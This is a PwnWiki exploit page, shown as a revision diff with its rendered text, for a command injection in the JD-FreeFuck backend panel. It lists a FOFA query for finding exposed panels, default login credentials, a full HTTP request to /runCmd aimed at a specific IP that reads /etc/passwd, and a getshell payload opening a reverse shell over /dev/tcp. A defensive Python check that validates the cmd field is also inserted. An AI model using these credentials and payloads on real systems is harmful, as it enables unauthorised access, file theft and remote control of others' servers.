Difference between revisions of "JD-FreeFuck Backend Command Execution Vulnerability"
From PwnWiki
(Marked this version for translation) |
|||
| Line 7: | Line 7: | ||
<translate> | <translate> | ||
| − | ==默認帳號密碼== | + | ==默認帳號密碼== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 14: | Line 14: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
發送如下請求包執行命令: | 發送如下請求包執行命令: | ||
</translate> | </translate> | ||
| Line 40: | Line 41: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
其中 cmd 參數存在命令注入。 | 其中 cmd 參數存在命令注入。 | ||
</translate> | </translate> | ||
| Line 49: | Line 51: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:5--> |
</translate> | </translate> | ||
Revision as of 22:35, 29 March 2021
FOFA
title="京东薅羊毛控制面板"
Default account and password
useradmin/supermanito
Exploitation
Send the following request to execute a command:
<pre>
POST /runCmd HTTP/1.1
Host: 101.200.189.251:5678
Content-Length: 50
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
Connection: close

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
</pre>
The cmd parameter is vulnerable to command injection.
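A defender-side check for this flaw, as an added example that is not PwnWiki's or the project's own code: it decodes the form body of a /runCmd request, rejects any cmd value that carries shell metacharacters or does not match an allowlisted shape, and returns an argument vector for execution without a shell. The allowed shape "bash jd.sh <task> now", the task-name alphabet and the function name are assumptions.

```python
import re
from urllib.parse import parse_qs

# Characters that a shell interprets as control syntax rather than data.
SHELL_META = re.compile(r"[;&|`$<>(){}'\"\\\n\r]")

# Assumed legitimate shape of the panel's command: "bash jd.sh <task> now".
# The task-name alphabet is an assumption, not taken from the project.
ALLOWED = re.compile(r"bash jd\.sh ([A-Za-z0-9_]+) now")


def inspect_run_cmd(body: str) -> dict:
    """Decode a form-encoded /runCmd body and classify its cmd field."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("cmd", [])
    if len(values) != 1:
        # Missing or repeated cmd: nothing unambiguous to validate, so reject.
        return {"allowed": False, "reason": "cmd missing or repeated", "argv": None}
    cmd = values[0]
    meta = sorted(set(SHELL_META.findall(cmd)))
    match = ALLOWED.fullmatch(cmd)
    if meta or match is None:
        reason = f"shell metacharacters {meta}" if meta else "not an allowed command"
        return {"allowed": False, "reason": reason, "argv": None}
    # Argument vector for execution without a shell, e.g. subprocess.run(argv).
    return {"allowed": True, "reason": "ok",
            "argv": ["bash", "jd.sh", match.group(1), "now"]}


# Body from the request shown on this page.
PAGE_BODY = "cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500"
# Constructed benign body; the task name is hypothetical.
BENIGN_BODY = "cmd=bash+jd.sh+bean_sign+now&delay=500"

if __name__ == "__main__":
    for body in (PAGE_BODY, BENIGN_BODY):
        print(inspect_run_cmd(body))
```

The allowlist match is the control that matters; the metacharacter scan only makes the rejection reason readable in logs.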
Getshell
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500